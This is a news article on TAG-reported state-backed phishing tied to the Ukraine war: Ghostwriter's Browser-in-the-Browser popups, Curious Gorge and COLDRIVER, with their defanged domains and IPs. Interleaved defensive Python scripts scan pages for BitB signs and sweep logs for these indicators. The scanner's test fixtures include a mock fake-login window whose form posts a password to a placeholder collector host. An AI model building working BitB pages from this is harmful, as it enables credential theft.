Belarusian ‘Ghostwriter’ Actor Picks Up BitB for Ukraine-Related Attacks

March 31, 2022

Ghostwriter is one of three campaigns using war-themed attacks, with cyber-fire coming in from government-backed actors in China, Iran, North Korea and Russia.

Ghostwriter, a threat actor previously linked to the Belarusian Ministry of Defense, has glommed onto the recently disclosed, nearly invisible "Browser-in-the-Browser" (BitB) credential-phishing technique in order to continue its ongoing exploitation of the war in Ukraine.

In a Wednesday post, Google's Threat Analysis Group (TAG) said that it had already spotted BitB being used by multiple government-backed actors before the media turned a laser eye on BitB earlier this month. The fresh attention was triggered by a penetration tester and security researcher, who goes by the handle mr.d0x, who posted a description of BitB.

Ghostwriter actors quickly picked up on BitB, combining it with another of the advanced persistent threat's (APT's) phishing techniques: namely, hosting credential-phishing landing pages on compromised websites.

BitB

The newly disclosed BitB credential-phishing technique takes advantage of third-party single sign-on (SSO) options embedded on websites that issue popup windows for authentication, such as "Sign in with Google," Facebook, Apple or Microsoft.

These days, SSO popups are a routine way to authenticate when you sign in.

But according to mr.d0x's post, completely fabricating a malicious version of a popup window is a snap: It's "quite simple" using basic HTML/CSS, the researcher said a few weeks ago. The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks.

"Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it's] basically indistinguishable," mr.d0x wrote at the time.

JavaScript can make the window appear on a link, button click or page-loading screen. As well, libraries, such as the popular jQuery JavaScript library, can make the window look visually appealing.

BitB Credential Phishing on Compromised Websites

In Wednesday's post, TAG gave an example, shown below, of how Ghostwriter has taken to hosting credential-phishing landing pages on compromised sites:

Example of hosting credential phishing landing pages on compromised websites. Source: TAG.

The BitB technique shown above involves drawing a login page that appears to be on the passport.i.ua domain over the page hosted on the compromised site. "Once a user provides credentials in the dialog, they are posted to an attacker controlled domain," TAG researchers said.
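The mismatch the article describes (a painted address bar naming one domain while the content is framed from, and credentials are posted to, another) is something a page scanner can look for. The following is an added example, not code from TAG, mr.d0x or the article; the sample pages and every hostname in them are constructed .example placeholders, and the two checks are assumed heuristics rather than anything TAG published:

```python
"""Heuristic scan of an HTML page for Browser-in-the-Browser (BitB) indicators.

Added example (not code from TAG, mr.d0x or the article). It looks for the
structural tell-tales described above: text painted to look like an address bar
naming one host, while the embedded content really comes from an <iframe> on a
different origin, or a password form that submits off-origin. The sample pages
and every hostname in them are constructed (.example placeholders).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Text that reads like an address bar: "https://host/path" or a bare "host.tld".
URL_TEXT = re.compile(
    r"^(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})(?:/\S*)?$", re.I)


def _host(url):
    host = urlsplit(url or "").hostname
    return host.lower() if host else None


class BitBScanner(HTMLParser):
    """Collect what the user is shown versus where content and credentials really go."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.displayed_hosts = set()      # hosts painted as text for the user to read
        self.iframe_hosts = set()         # origins that actually supply framed content
        self.password_post_hosts = set()  # where forms holding a password field submit
        self._form_host = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            host = _host(a.get("src"))
            if host:
                self.iframe_hosts.add(host)
        elif tag == "form":
            # A relative or missing action posts back to the page's own host.
            self._form_host = _host(a.get("action")) or self.page_host
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_post_hosts.add(self._form_host or self.page_host)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_host = None

    def handle_data(self, data):
        m = URL_TEXT.match(data.strip())
        if m:
            self.displayed_hosts.add(m.group(1).lower())


def scan_for_bitb(html, page_host):
    """Return (indicator, host, framed_hosts) tuples; an empty list means nothing fired."""
    s = BitBScanner(page_host)
    s.feed(html)
    s.close()
    findings = []
    foreign_frames = sorted(h for h in s.iframe_hosts if h != s.page_host)
    # A displayed login URL whose host serves nothing on this page, next to a
    # frame from somewhere else, is the spoofed address bar of a BitB window.
    for shown in sorted(s.displayed_hosts):
        if shown != s.page_host and shown not in s.iframe_hosts and foreign_frames:
            findings.append(("spoofed_address_bar", shown, foreign_frames))
    # Credentials leaving for a host other than the one serving the form.
    for dest in sorted(s.password_post_hosts):
        if dest != s.page_host:
            findings.append(("password_posted_off_origin", dest, []))
    return findings


# Constructed outer page on a hypothetical compromised site: a <div> dressed up as a
# popup window, a fake address bar as plain text, and the real content framed in.
OUTER_PAGE = """<html><body>
<h1>compromised-blog.example</h1>
<div class="fake-window">
  <div class="fake-titlebar">Sign in - Accounts</div>
  <div class="fake-addressbar">https://accounts.login.example/signin</div>
  <iframe src="https://login-validate.example/"></iframe>
</div></body></html>"""

# Constructed framed page, served from the placeholder attacker-controlled host.
INNER_PAGE = """<html><body>
<form action="https://collector.example/post" method="post">
  <input name="user"><input name="pass" type="password"><button>Next</button>
</form></body></html>"""

# Constructed benign page: a foreign iframe (an embedded video) but no painted URL.
BENIGN_PAGE = """<html><body><p>Watch the talk:</p>
<iframe src="https://video.example/embed/42"></iframe></body></html>"""

if __name__ == "__main__":
    for name, html, host in (("outer", OUTER_PAGE, "compromised-blog.example"),
                             ("inner", INNER_PAGE, "login-validate.example"),
                             ("benign", BENIGN_PAGE, "shop.example")):
        print(name, scan_for_bitb(html, host))
```

The benign page shows why the first check needs both halves: a foreign iframe on its own is ordinary (embedded video, widgets), and only the combination with a painted URL that no frame on the page actually serves is suspicious. The second check fires on the framed login page itself, where the password form submits to a host other than the one that served it.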

TAG has recently observed Ghostwriter credential phishing on these domains:

  • login-verification[.]top
  • login-validate[.]top
  • ua-login[.]top
  • secure-ua[.]space
  • secure-ua[.]top

Other Campaigns Launched by Government-Backed Actors in China, Iran, North Korea & Russia

Since early March, Ghostwriter's use of BitB is just one of a trio of cyber-aggressions that TAG has been tracking in connection with Russia's invasion of Ukraine.

The use of the war as a lure in phishing and malware campaigns has continued to grow throughout the month, TAG said, with related cyberattacks coming in from government-backed actors from China, Iran, North Korea and Russia, as well as from various unattributed groups, according to TAG's Wednesday post.

Actors "have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," TAG said.

Curious Gorge

Besides Ghostwriter's BitB campaigns, TAG has spotted a group it's calling Curious Gorge, which it attributes to China's PLA SSF, conducting campaigns against government and military organizations in Ukraine, Russia, Kazakhstan and Mongolia.

"While this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations," TAG said.

Below is a list of IPs used in Curious Gorge campaigns that TAG has recently observed:

  • 5.188.108[.]119
  • 91.216.190[.]58
  • 103.27.186[.]23
  • 114.249.31[.]171
  • 45.154.12[.]167

COLDRIVER

Finally, TAG has also observed COLDRIVER, a Russia-based threat actor sometimes referred to as Calisto, which has launched credential-phishing campaigns targeting several United States-based NGOs and think tanks, the military of a Balkans country, and a Ukraine-based defense contractor.

Now, however, for the first time, COLDRIVER is targeting the military of multiple Eastern European countries and a NATO Centre of Excellence, TAG reported.

Google doesn't know how successful these campaigns have been, given that they were sent from newly created Gmail accounts to non-Google accounts. At any rate, Google has not seen any Gmail accounts successfully compromised because of these campaigns, TAG said.

Recently observed COLDRIVER credential-phishing domains:

  • protect-link[.]online
  • drive-share[.]live
  • protection-office[.]live
  • proton-viewer[.]com
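The three indicator lists in this article (Ghostwriter domains, Curious Gorge IPs, COLDRIVER domains) are published defanged with `[.]`, so they cannot be grepped against live logs as printed. The script below is an added example, not code from TAG or the article: it refangs the article's indicators and sweeps log lines for exact or subdomain matches. The DNS and proxy log lines and the 10.0.0.0/8 client addresses are constructed for the demonstration.

```python
"""Sweep log lines for the indicators TAG published for Ghostwriter, Curious Gorge
and COLDRIVER. Added example (not code from TAG or the article): the indicator
values are the ones the article lists, kept in the defanged "[.]" form they were
published in; the log lines and the 10.0.0.0/8 client addresses are constructed.
"""
import ipaddress
import re

INDICATORS = {
    "Ghostwriter": ["login-verification[.]top", "login-validate[.]top", "ua-login[.]top",
                    "secure-ua[.]space", "secure-ua[.]top"],
    "Curious Gorge": ["5.188.108[.]119", "91.216.190[.]58", "103.27.186[.]23",
                      "114.249.31[.]171", "45.154.12[.]167"],
    "COLDRIVER": ["protect-link[.]online", "drive-share[.]live",
                  "protection-office[.]live", "proton-viewer[.]com"],
}

# Anything that looks like a dotted IPv4 address or a dotted hostname.
HOST_OR_IP = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)


def refang(ioc):
    """Undo the defanging used in reports so the value can be compared with live logs."""
    return ioc.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def build_ioc_table(indicators=INDICATORS):
    """Map each refanged indicator to the actor it is attributed to."""
    return {refang(raw): actor for actor, raws in indicators.items() for raw in raws}


def match_log_line(line, table):
    """Return [(indicator, actor)] for every listed IP or domain (or subdomain) on the line."""
    hits = []
    for token in HOST_OR_IP.findall(line):
        token = token.lower()
        for ioc, actor in table.items():
            exact = token == ioc
            # A subdomain such as mail.<listed-domain> still belongs to the listed domain;
            # IP indicators only match exactly.
            under = not is_ip(ioc) and token.endswith("." + ioc)
            if (exact or under) and (ioc, actor) not in hits:
                hits.append((ioc, actor))
    return hits


def sweep(lines, table=None):
    """Return (actor, indicator, line) for every hit across the given log lines."""
    table = table or build_ioc_table()
    return [(actor, ioc, line) for line in lines for ioc, actor in match_log_line(line, table)]


# Constructed DNS and proxy log lines; three of the four touch a listed indicator.
SAMPLE_LOGS = [
    "2022-03-30T10:14:02Z dns client=10.0.0.23 qtype=A qname=login-validate.top",
    "2022-03-30T10:14:03Z proxy src=10.0.0.23 dst=45.154.12.167:443 method=CONNECT",
    "2022-03-30T10:15:11Z proxy src=10.0.0.41 url=https://mail.proton-viewer.com/login status=200",
    "2022-03-30T10:16:40Z dns client=10.0.0.9 qtype=A qname=www.example.com",
]

if __name__ == "__main__":
    for actor, ioc, line in sweep(SAMPLE_LOGS):
        print(f"{actor:14} {ioc:24} {line}")
```

Matching on the registered domain plus any subdomain catches hosts such as `mail.proton-viewer.com` that a literal string compare would miss, while the leading dot in the suffix test keeps a look-alike such as `notsecure-ua.space` from matching `secure-ua.space`. Run against real DNS or proxy exports, each hit gives the client address in the same line, which is the pivot to the user who was phished.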

Some elements of this posting are sourced from:
threatpost.com
